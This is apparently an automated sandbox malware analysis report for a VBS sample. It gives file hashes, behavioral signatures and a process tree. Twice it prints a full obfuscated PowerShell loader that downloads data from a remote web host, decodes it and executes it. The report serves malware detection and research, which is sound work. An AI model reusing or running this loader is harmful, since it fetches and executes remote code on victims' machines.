Overview
overview
10Static
static
102eeedb8129...a1.exe
windows7-x64
102eeedb8129...a1.exe
windows10-2004-x64
1068f3f6a8e2...67.elf
ubuntu-22.04-amd64
176a5d5651a...67b.js
windows7-x64
876a5d5651a...67b.js
windows10-2004-x64
88be322fd53...98.vbs
windows7-x64
88be322fd53...98.vbs
windows10-2004-x64
892e0a7687d...35.exe
windows7-x64
1092e0a7687d...35.exe
windows10-2004-x64
10967059c927...af.rtf
windows7-x64
8967059c927...af.rtf
windows10-2004-x64
1a9fef3bf43...96.exe
windows7-x64
10a9fef3bf43...96.exe
windows10-2004-x64
10bbb50d99d2...1d5.js
windows7-x64
8bbb50d99d2...1d5.js
windows10-2004-x64
8Analysis
-
max time kernel
126s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 18:18
Behavioral task
behavioral1
Sample
2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
68f3f6a8e2c034cfa63a5083aa214e6973ec425313e52d78ce5f4360e00d9867.elf
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral4
Sample
76a5d5651a6bb05f67e88fb646e969963c8f3baeda763a86649d4cd2f2ff967b.js
Resource
win7-20240903-en
Behavioral task
behavioral5
Sample
76a5d5651a6bb05f67e88fb646e969963c8f3baeda763a86649d4cd2f2ff967b.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs
Resource
win7-20241010-en
Behavioral task
behavioral7
Sample
8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral8
Sample
92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe
Resource
win7-20240903-en
Behavioral task
behavioral9
Sample
92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral10
Sample
967059c927f066a79905cf5a2f99562ca72409238322098e8ac93c905e75a1af.rtf
Resource
win7-20240903-en
Behavioral task
behavioral11
Sample
967059c927f066a79905cf5a2f99562ca72409238322098e8ac93c905e75a1af.rtf
Resource
win10v2004-20241007-en
Behavioral task
behavioral12
Sample
a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe
Resource
win7-20240708-en
Behavioral task
behavioral13
Sample
a9fef3bf43ae17b1ea2361ea59c5584caf762bd450dc8f120fdbf7f9fe523e96.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral14
Sample
bbb50d99d2286fd78099998d4b3f17e441927cfa1e3951893e7acecf77fee1d5.js
Resource
win7-20241023-en
Behavioral task
behavioral15
Sample
bbb50d99d2286fd78099998d4b3f17e441927cfa1e3951893e7acecf77fee1d5.js
Resource
win10v2004-20241007-en
General
-
Target
8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs
-
Size
132KB
-
MD5
3b613b81a9d2bfb9ee156ff4f3e03a93
-
SHA1
8364c6919db9ecf241af281d380d464dc59c84ba
-
SHA256
8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998
-
SHA512
cab65db7ff1ef2f743b68e4aec31c1d6ed000172510ed0d9f57d7a4d44dbaf26844bcf353537fdc4a71ad90a48ad60d4058fa25679e52649071079da56ca8d7f
-
SSDEEP
3072:fwuzkYMPZJqaVBsPHFBktYkCeJ+URvMP/Rj5mk36VYK4qhU4IsMMBlt:f7kYMPZoaVBsPHFBqYkR+URkP/Rj5mj1
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 2840 powershell.exe -
Processes:
powershell.exepowershell.exepid process 2840 powershell.exe 2804 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
ping.exeping.exepid process 2160 ping.exe 2188 ping.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid process 2840 powershell.exe 2804 powershell.exe 2804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 2804 powershell.exe -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 2600 wrote to memory of 2160 2600 WScript.exe ping.exe PID 2600 wrote to memory of 2160 2600 WScript.exe ping.exe PID 2600 wrote to memory of 2160 2600 WScript.exe ping.exe PID 2600 wrote to memory of 2188 2600 WScript.exe ping.exe PID 2600 wrote to memory of 2188 2600 WScript.exe ping.exe PID 2600 wrote to memory of 2188 2600 WScript.exe ping.exe PID 2600 wrote to memory of 2888 2600 WScript.exe cmd.exe PID 2600 wrote to memory of 2888 2600 WScript.exe cmd.exe PID 2600 wrote to memory of 2888 2600 WScript.exe cmd.exe PID 2600 wrote to memory of 2840 2600 WScript.exe powershell.exe PID 2600 wrote to memory of 2840 2600 WScript.exe powershell.exe PID 2600 wrote to memory of 2840 2600 WScript.exe powershell.exe PID 2840 wrote to memory of 2704 2840 powershell.exe cmd.exe PID 2840 wrote to memory of 2704 2840 powershell.exe cmd.exe PID 2840 wrote to memory of 2704 2840 powershell.exe cmd.exe PID 2840 wrote to memory of 2804 2840 powershell.exe powershell.exe PID 2840 wrote to memory of 2804 2840 powershell.exe powershell.exe PID 2840 wrote to memory of 2804 2840 powershell.exe powershell.exe PID 2840 wrote to memory of 2804 2840 powershell.exe powershell.exe PID 2804 wrote to memory of 2664 2804 powershell.exe cmd.exe PID 2804 wrote to memory of 2664 2804 powershell.exe cmd.exe PID 2804 wrote to memory of 2664 2804 powershell.exe cmd.exe PID 2804 wrote to memory of 2664 2804 powershell.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\System32\ping.exeping google.com -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2160
-
-
C:\Windows\System32\ping.exeping %.%.%.%2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir2⤵PID:2888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$graanes = 1;Function Steatolytic($Feltsengenes){$Procereal=$Feltsengenes.Length-$graanes;$Bagger='Substring';For( $Enligtstilledes=5;$Enligtstilledes -lt $Procereal;$Enligtstilledes+=6){$Uncleanlily164+=$Feltsengenes.$Bagger.Invoke( $Enligtstilledes, $graanes);}$Uncleanlily164;}function schlepper($Lamond){ . ($Vittighed) ($Lamond);}$Xenofobi=Steatolytic 'E terMUnabsoFeatuzHeteriBilinl EnkrlNeumaaPigtr/Disco5M.xop. Taxo0 .dtm Viss (Vi cuWSlu,niLineanSem.edColo,oToptywAn.ets Cham SoreoNRangeTKambr octag1 Abol0Slaae.Tughr0Dispa;wiene gypp,W TeapiSlavenGramm6 T si4Dyarc;Ab,li Strogx Boo 6Pricy4S aln;Teach Fo osromkvdv roo:C,ino1 Non.2horke1Spytk.Acc,d0Deoxi)Natur TredvGShelleLibr c rustkMarmooMonod/Indkb2Assem0Cytod1,rykk0Digit0 Fors1Ma,le0Exten1Count uftkFPer.giFejlsrNedtre.rrelfteughoGel,txPangs/.ekru1An dy2Ragou1 rape.Arres0 Se,s ';$Dingdong=Steatolytic 'QuizmUCirk sIronsedruknrunipe-Uni.pAInyokgTritiePock,ntartatAplit ';$Externalism=Steatolytic 'MorgahRe iot.ssemtRecurpFortr:acrop/ Bl,d/RotorwDetaiw.opulw Jagt.YngleeLivsvnHe.ereSquirrUnderg SubtyPrecr-OpdrtsCra ne abesrAnativSnuse.An iarEgal.oMamba/ClaviGSpotseante,nDi etf s ksoPurprrAntite Re lnChe.kiKastsnAutorg laresU,enl.Bivu,d TainwPaa.rpMidtv ';$Underbeak=Steatolytic 'aw le>Veder ';$Vittighed=Steatolytic 'overaiDistre,omanxSc,th ';$Bibeholdelsernes='Skolelreren';$Klediskenes = Steatolytic '.etapeGartncrhinsh HjdeoFaris Mult%,orbiaKababpSpottpSpathdconchaScofft Mu iaP eud%fort.\ StilMSrsk a BlgegFuelstPerisknut,aa CrypmNonstpPeasaeAmerinOvoges Fi.m. AlleBH,rseiThi,tbMids. Besv & Kede&Mohik StabeeUnnumc IrrehApopho Regl BikortUpway ';schlepper (Steatolytic 'Gifte$MylohgLoghelPolteovizorbSki maOpercl Bams:Fet.cSTyperq AbseuConnea Homim Avan=H ndy(DupskcInd.mmR dredInte perig/ R cicBr.ss Se.ge$DiffeKFagl.lFrosteTopf dUnreai R susUnderk HuggeRejecn repreUnc rs,rgan) Empo ');schlepper (Steatolytic 'Rdgr,$Ab,trgMgbunl KomtoFiskebgravlaCarmel Indl: GlosCUrsoluSiouxrMestraStilttM scei lottcBouga2 Topn3Dia,o2 Bram=Ecdys$sv.psEMyr,ex BeritPre,geAnsigrCa lenI,peta.orrelAndetiHenvesPytonmMono..EnshasAntagp spedlUdtydiOverptStu p(Elapi$HeterUUnrewnHferhd .kskePipi.rBedlab SetieProkua NonlkFejlb)Demur ');$Externalism=$Curatic232[0];$Coenenchym= (Steatolytic 'Fiske$Pol,cgskadelEloigo Fiskb P,liaIs,aml Vrdi:DiskeTNedslhSca ieBoehmr,lowheFattib.otizyale t=SuperNBiklaeTreatwTropi-VidenONontebenth jGennee GenncbefoltEta.r EfterSGavlhyVandks GunltL.xineLik,imAndel.InopeNKotoweS.ppotPosta.So,teW IsoceGrandbSupp,CFor al,lassi .miteundernBor.rt');$Coenenchym+=$Squam[1];schlepper ($Coenenchym);schlepper (Steatolytic ' ondo$InvenTVehefh udeneTur.erPsycheWithobOstomyMa,tr.scariH PhyteUnbeaaPatted KofieHydrorPsychsprota[Briar$AlloxDImpl i TrionLysn,gobligdDarnso Tou nAvifagAntic]Damga= etag$SekteXErbiue TabunIllibouroenfH,poto BrdebBl,nniRaci, ');$Pedicellated159=Steatolytic 'Skrmf$ andTPreaghSkurke Fal.r nemoeStipubArbejy Unav. PsycDsemisoProblwJertfnS ddel Stifo Udsia,eridd armhF MyosiElsinlA.tage Ef e(Presc$Hu.riEfejlbxContrt ShyleHe errO letn RealaPosselSilkei Ne,fsRekvimMidwe,Seko,$SteepS Vi,lpEndopiRek,lr Re,siBe,tytR arhuDyrskaRetablNo maiMasc.sNondymAdv neThore)tinge ';$Spiritualisme=$Squam[0];schlepper (Steatolytic 'kursu$Resulg F.gelUnsphoDigitbUnchraArbejlSpad,:Le.onbVildsr Emunn Capie Truss Benzi amshkAadkorMarkeivarslnUndergAcupue Aut,rUbnhrsGutli=w ndf(Allo,T KonteBuk esLgesttFinge-skidtP.udgeaTeksttTermihMal r Lydse$ReparSA,onnpVidneiRegisrUnd,liPadout Na buMultia turdl OveriCar isStenkm.ordyeIntri)Serbo ');while (!$brnesikringers) {schlepper (Steatolytic 'hospi$Dr.kngMedlilVicksoPladsbkv tuaPakkelReass: atwaVTrut.aAntigrgangee AnaldScop e Forek Rekll insuaArticrBrefre Rubbrfng,eeCobbltForma=Delin$Undert Mis,r Fedtu Lokae Udfo ') ;schlepper $Pedicellated159;schlepper (Steatolytic 'In drSRek at Ved.a .ndlr OdietNewsb-C,labSUdsanlJagtgeChurle.natopChrys onyun4Ungar ');schlepper (Steatolytic 'Hu,dr$Trio.g HeadlUniveoBu heb S.lea Hovelaustr: A,phbCeratrtheolnAtla e OutbsSawb iCampakTark,rSemiciEncrynPokingHybrieLindrrEndots vrms=Nulst( BeskT VolueReg,esPaa,gt Bemo-AneroP FyrsaPhan.tg idehGevan Overs$KnudeSK mmepatmosiTaraxrSewariForsktakvaruSettoaIlluslBes,riSwiwesForammNe,coe Eve.)Ti ba ') ;schlepper (Steatolytic 'Cry,t$Vehefg S mil viceoSplitbGentlaContol.ikle:Lea hSBoligaMletstUnbela rivanHavebi Lu.usGr ene Wa s4Frisk6End c=Li do$,orttgMve,rl Spe oSydhabopdaga.denolbelgn:trundAA.tiedGe.neoLegetpPosnitAntiaa In.enPeroxtSotree M larPro,usPreva+missi+ B tt%Ku an$PeculCGena,uKlni,rSu,cea,utiltUnraniUdhvncVse t2Ge,ni3Una n2Progr.S inncUltraoTikrou Aemin Unfit Pore ') ;$Externalism=$Curatic232[$Satanise46];}$Fangerne115=311650;$Uomtvisteligheds=29747;schlepper (Steatolytic 'R mot$overrgFril.lAccumoSubchbForbiaRebe l Conc:brakvL Mis aRewets S.bct Sheve.mblyeElephv R ssnP ojee resasU eal Forda= Si k PeploG Roste CytotYarne-Th.spCErhveoSte.gnB.vaatMajbreKorrin Box,t Mis, H per$ServiS vandp Bas.iLuddir BlaniHnsehtFr lauOver,aH,urel.mpaliVanrysbran mCardieK ntr ');schlepper (Steatolytic 'P ran$Zy,otgScabblBeaucovaterbBundpaDi talKva,r:SarcoB JubheSlgtss,lumevLiviaiLobatmSkylde StaglSpasmsAculeeD fenrAppernMat.reFourqsTeuto lsr,v=Rasal Epita[ KrseSblirry ilssFe.lhtStetie G usmKirtl. epi.CRespioRdkaanTiaarvSansee bdigrwoo.htPens,]Prefa:U.raa:O onnFEfte rCostmoOeretmBes.fBAugusaChlorsBal,ieDioti6Paask4Ch.ssSM,cketOlympr s opiHjlp nForurg Acco( Pol.$Sj,skL Gruna MgfasFlgett BraneHovedeSekt v illenUnelaeeuropsTypon)s.ept ');schlepper (Steatolytic 'Ln um$ thyrgFontnl.lfbjoFran bTerr.aSportlNumer:Unde,B .verrDefacuSprinnForels No,atE.uats Enke Vaing=udsky Chlam[QuiddSInterySkolisD.velt ,ksee .yncmKleri.,abulT Svider,visxPuncttKlods.NemerED mstnReunicArbejoQuizddBoeo.i Peain Jyllgunque]Mitvo: Cook:SikkeA L,diSAnlbeCHudd IKatniIAlim .Sk,abG craceEnfratAl.unSReb.lt muz.r Hapli NonsnQuippgOutwi(Al.oi$.pfinBFortreFrag sV,rguvMonetiZap emCon teHovm l wordsFejlve ersrLasednDrmmeeSmrkesHisp,)Pat.i ');schlepper (Steatolytic ' Danc$ Crusg.ragelXylofo Te,rbsch,haPeritlAnari:Rad.oAFladerS.ytsbKi oreIncomjD,pind FitzsVa,mef EfteeJord.lConv tFremtePa,sarElber=ned.a$ StifBUdbygrPlaceuSunsmnphlo sC erctUdvlgsOrbit.pebblsUd kuuMlejebTem,usStockt AmilrHnsegiGall,nStan,gRefug(Jinji$Pais,FEightaMisfon.ummegC,rtie UnsorPendlnKer he e ra1L nge1Aflaa5Siksa, D,ti$ScorcUEleuto .nspmBrygmtRi,sfvU imeiMyldrsBechatdi areStililSkr.aiMe.afg .uenhAfpreeThreadUnjags Plan)Efter ');schlepper $Arbejdsfelter;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magtkampens.Bib && echo t"3⤵PID:2704
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$graanes = 1;Function Steatolytic($Feltsengenes){$Procereal=$Feltsengenes.Length-$graanes;$Bagger='Substring';For( $Enligtstilledes=5;$Enligtstilledes -lt $Procereal;$Enligtstilledes+=6){$Uncleanlily164+=$Feltsengenes.$Bagger.Invoke( $Enligtstilledes, $graanes);}$Uncleanlily164;}function schlepper($Lamond){ . ($Vittighed) ($Lamond);}$Xenofobi=Steatolytic 'E terMUnabsoFeatuzHeteriBilinl EnkrlNeumaaPigtr/Disco5M.xop. Taxo0 .dtm Viss (Vi cuWSlu,niLineanSem.edColo,oToptywAn.ets Cham SoreoNRangeTKambr octag1 Abol0Slaae.Tughr0Dispa;wiene gypp,W TeapiSlavenGramm6 T si4Dyarc;Ab,li Strogx Boo 6Pricy4S aln;Teach Fo osromkvdv roo:C,ino1 Non.2horke1Spytk.Acc,d0Deoxi)Natur TredvGShelleLibr c rustkMarmooMonod/Indkb2Assem0Cytod1,rykk0Digit0 Fors1Ma,le0Exten1Count uftkFPer.giFejlsrNedtre.rrelfteughoGel,txPangs/.ekru1An dy2Ragou1 rape.Arres0 Se,s ';$Dingdong=Steatolytic 'QuizmUCirk sIronsedruknrunipe-Uni.pAInyokgTritiePock,ntartatAplit ';$Externalism=Steatolytic 'MorgahRe iot.ssemtRecurpFortr:acrop/ Bl,d/RotorwDetaiw.opulw Jagt.YngleeLivsvnHe.ereSquirrUnderg SubtyPrecr-OpdrtsCra ne abesrAnativSnuse.An iarEgal.oMamba/ClaviGSpotseante,nDi etf s ksoPurprrAntite Re lnChe.kiKastsnAutorg laresU,enl.Bivu,d TainwPaa.rpMidtv ';$Underbeak=Steatolytic 'aw le>Veder ';$Vittighed=Steatolytic 'overaiDistre,omanxSc,th ';$Bibeholdelsernes='Skolelreren';$Klediskenes = Steatolytic '.etapeGartncrhinsh HjdeoFaris Mult%,orbiaKababpSpottpSpathdconchaScofft Mu iaP eud%fort.\ StilMSrsk a BlgegFuelstPerisknut,aa CrypmNonstpPeasaeAmerinOvoges Fi.m. AlleBH,rseiThi,tbMids. Besv & Kede&Mohik StabeeUnnumc IrrehApopho Regl BikortUpway ';schlepper (Steatolytic 'Gifte$MylohgLoghelPolteovizorbSki maOpercl Bams:Fet.cSTyperq AbseuConnea Homim Avan=H ndy(DupskcInd.mmR dredInte perig/ R cicBr.ss Se.ge$DiffeKFagl.lFrosteTopf dUnreai R susUnderk HuggeRejecn repreUnc rs,rgan) Empo ');schlepper (Steatolytic 'Rdgr,$Ab,trgMgbunl KomtoFiskebgravlaCarmel Indl: GlosCUrsoluSiouxrMestraStilttM scei lottcBouga2 Topn3Dia,o2 Bram=Ecdys$sv.psEMyr,ex BeritPre,geAnsigrCa lenI,peta.orrelAndetiHenvesPytonmMono..EnshasAntagp spedlUdtydiOverptStu p(Elapi$HeterUUnrewnHferhd .kskePipi.rBedlab SetieProkua NonlkFejlb)Demur ');$Externalism=$Curatic232[0];$Coenenchym= (Steatolytic 'Fiske$Pol,cgskadelEloigo Fiskb P,liaIs,aml Vrdi:DiskeTNedslhSca ieBoehmr,lowheFattib.otizyale t=SuperNBiklaeTreatwTropi-VidenONontebenth jGennee GenncbefoltEta.r EfterSGavlhyVandks GunltL.xineLik,imAndel.InopeNKotoweS.ppotPosta.So,teW IsoceGrandbSupp,CFor al,lassi .miteundernBor.rt');$Coenenchym+=$Squam[1];schlepper ($Coenenchym);schlepper (Steatolytic ' ondo$InvenTVehefh udeneTur.erPsycheWithobOstomyMa,tr.scariH PhyteUnbeaaPatted KofieHydrorPsychsprota[Briar$AlloxDImpl i TrionLysn,gobligdDarnso Tou nAvifagAntic]Damga= etag$SekteXErbiue TabunIllibouroenfH,poto BrdebBl,nniRaci, ');$Pedicellated159=Steatolytic 'Skrmf$ andTPreaghSkurke Fal.r nemoeStipubArbejy Unav. PsycDsemisoProblwJertfnS ddel Stifo Udsia,eridd armhF MyosiElsinlA.tage Ef e(Presc$Hu.riEfejlbxContrt ShyleHe errO letn RealaPosselSilkei Ne,fsRekvimMidwe,Seko,$SteepS Vi,lpEndopiRek,lr Re,siBe,tytR arhuDyrskaRetablNo maiMasc.sNondymAdv neThore)tinge ';$Spiritualisme=$Squam[0];schlepper (Steatolytic 'kursu$Resulg F.gelUnsphoDigitbUnchraArbejlSpad,:Le.onbVildsr Emunn Capie Truss Benzi amshkAadkorMarkeivarslnUndergAcupue Aut,rUbnhrsGutli=w ndf(Allo,T KonteBuk esLgesttFinge-skidtP.udgeaTeksttTermihMal r Lydse$ReparSA,onnpVidneiRegisrUnd,liPadout Na buMultia turdl OveriCar isStenkm.ordyeIntri)Serbo ');while (!$brnesikringers) {schlepper (Steatolytic 'hospi$Dr.kngMedlilVicksoPladsbkv tuaPakkelReass: atwaVTrut.aAntigrgangee AnaldScop e Forek Rekll insuaArticrBrefre Rubbrfng,eeCobbltForma=Delin$Undert Mis,r Fedtu Lokae Udfo ') ;schlepper $Pedicellated159;schlepper (Steatolytic 'In drSRek at Ved.a .ndlr OdietNewsb-C,labSUdsanlJagtgeChurle.natopChrys onyun4Ungar ');schlepper (Steatolytic 'Hu,dr$Trio.g HeadlUniveoBu heb S.lea Hovelaustr: A,phbCeratrtheolnAtla e OutbsSawb iCampakTark,rSemiciEncrynPokingHybrieLindrrEndots vrms=Nulst( BeskT VolueReg,esPaa,gt Bemo-AneroP FyrsaPhan.tg idehGevan Overs$KnudeSK mmepatmosiTaraxrSewariForsktakvaruSettoaIlluslBes,riSwiwesForammNe,coe Eve.)Ti ba ') ;schlepper (Steatolytic 'Cry,t$Vehefg S mil viceoSplitbGentlaContol.ikle:Lea hSBoligaMletstUnbela rivanHavebi Lu.usGr ene Wa s4Frisk6End c=Li do$,orttgMve,rl Spe oSydhabopdaga.denolbelgn:trundAA.tiedGe.neoLegetpPosnitAntiaa In.enPeroxtSotree M larPro,usPreva+missi+ B tt%Ku an$PeculCGena,uKlni,rSu,cea,utiltUnraniUdhvncVse t2Ge,ni3Una n2Progr.S inncUltraoTikrou Aemin Unfit Pore ') ;$Externalism=$Curatic232[$Satanise46];}$Fangerne115=311650;$Uomtvisteligheds=29747;schlepper (Steatolytic 'R mot$overrgFril.lAccumoSubchbForbiaRebe l Conc:brakvL Mis aRewets S.bct Sheve.mblyeElephv R ssnP ojee resasU eal Forda= Si k PeploG Roste CytotYarne-Th.spCErhveoSte.gnB.vaatMajbreKorrin Box,t Mis, H per$ServiS vandp Bas.iLuddir BlaniHnsehtFr lauOver,aH,urel.mpaliVanrysbran mCardieK ntr ');schlepper (Steatolytic 'P ran$Zy,otgScabblBeaucovaterbBundpaDi talKva,r:SarcoB JubheSlgtss,lumevLiviaiLobatmSkylde StaglSpasmsAculeeD fenrAppernMat.reFourqsTeuto lsr,v=Rasal Epita[ KrseSblirry ilssFe.lhtStetie G usmKirtl. epi.CRespioRdkaanTiaarvSansee bdigrwoo.htPens,]Prefa:U.raa:O onnFEfte rCostmoOeretmBes.fBAugusaChlorsBal,ieDioti6Paask4Ch.ssSM,cketOlympr s opiHjlp nForurg Acco( Pol.$Sj,skL Gruna MgfasFlgett BraneHovedeSekt v illenUnelaeeuropsTypon)s.ept ');schlepper (Steatolytic 'Ln um$ thyrgFontnl.lfbjoFran bTerr.aSportlNumer:Unde,B .verrDefacuSprinnForels No,atE.uats Enke Vaing=udsky Chlam[QuiddSInterySkolisD.velt ,ksee .yncmKleri.,abulT Svider,visxPuncttKlods.NemerED mstnReunicArbejoQuizddBoeo.i Peain Jyllgunque]Mitvo: Cook:SikkeA L,diSAnlbeCHudd IKatniIAlim .Sk,abG craceEnfratAl.unSReb.lt muz.r Hapli NonsnQuippgOutwi(Al.oi$.pfinBFortreFrag sV,rguvMonetiZap emCon teHovm l wordsFejlve ersrLasednDrmmeeSmrkesHisp,)Pat.i ');schlepper (Steatolytic ' Danc$ Crusg.ragelXylofo Te,rbsch,haPeritlAnari:Rad.oAFladerS.ytsbKi oreIncomjD,pind FitzsVa,mef EfteeJord.lConv tFremtePa,sarElber=ned.a$ StifBUdbygrPlaceuSunsmnphlo sC erctUdvlgsOrbit.pebblsUd kuuMlejebTem,usStockt AmilrHnsegiGall,nStan,gRefug(Jinji$Pais,FEightaMisfon.ummegC,rtie UnsorPendlnKer he e ra1L nge1Aflaa5Siksa, D,ti$ScorcUEleuto .nspmBrygmtRi,sfvU imeiMyldrsBechatdi areStililSkr.aiMe.afg .uenhAfpreeThreadUnjags Plan)Efter ');schlepper $Arbejdsfelter;"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magtkampens.Bib && echo t"4⤵
- System Location Discovery: System Language Discovery
PID:2664
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
444KB
MD58dd5eb68685e339e1651cbeefd0b235f
SHA1cef3800a21bf4b8142333629fe685d1107c1ffa5
SHA2565cf4b171cfc0ad5166bc8be93b41bcebe53aa1c1194a054271201dcbe48c84d1
SHA51283d40812894f1fc3d03aca47686776fc6361a1fa52fe2f11ef22c2952c6b65d7422c34b47cbd61d37e77a3048358de2ee3ffc3ab67990d15abf3ca71c8d55b97
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B1OV4B2N0I250XZM9KHX.temp
Filesize7KB
MD5182295c18c3a9995f3b25fc6d9d78447
SHA165fe1c23b4e00e0af664588fba5ad803bb93bb9b
SHA2560587b01d956db7779222463685fc55b6a0be90d26fdbc218df826546f366ef9c
SHA5129e44e2178e9075ba4f74a270350e56e05f65c3128949c2496070015c68bfdb207be9fda381b5f6fc140dbfc844797f1974595edee0215a20b1b1692a528d4cb0